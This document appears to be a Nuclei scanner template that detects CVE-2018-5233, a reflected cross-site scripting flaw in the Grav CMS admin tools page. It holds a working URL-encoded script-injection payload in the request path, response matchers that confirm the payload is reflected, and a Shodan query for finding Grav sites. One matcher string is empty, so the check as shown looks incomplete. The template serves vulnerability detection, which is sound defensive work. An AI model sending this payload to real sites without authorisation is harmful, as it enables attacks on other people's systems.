id: CVE-2018-5233 info: name: Grav CMS <1.3.0 - Cross-Site Scripting author: pikpikcu severity: medium description: | Grav CMS before 1.3.0 is vulnerable to cross-site scripting via system/src/Grav/Common/Twig/Twig.php and allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO to admin/tools. remediation: | Upgrade Grav CMS to version 1.3.0 or later, which includes proper input sanitization to mitigate the XSS vulnerability. reference: - https://sysdream.com/news/lab/2018-03-15-cve-2018-5233-grav-cms-admin-plugin-reflected-cross-site-scripting-xss-vulnerability/ - http://www.openwall.com/lists/oss-security/2018/03/15/1 - https://nvd.nist.gov/vuln/detail/CVE-2018-5233 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2018-5233 cwe-id: CWE-79 epss-score: 0.00295 epss-percentile: 0.66027 cpe: cpe:2.3:a:getgrav:grav_cms:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: getgrav product: grav_cms shodan-query: html:"Grav CMS" tags: cve,cve2018,xss,grav,getgrav http: - method: GET path: - "{{BaseURL}}/admin/tools/a--%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" matchers-condition: and matchers: - type: word part: body words: - '' - type: word part: body words: - '/themes/grav' - 'Grav Admin Login' - 'data-grav-' condition: or - type: word part: header words: - text/html - type: status status: - 200 # digest: 4a0a004730450221008fc5743497356ec6159ae763b2e6f9365bc68dc1fb360ac359d2ee503375940b02207e162126a565885b691ea8504dd72a9bd2b4e0ca59e04f5e378deb30aefb8aa8:922c64590222798bb761d5b6d8e72950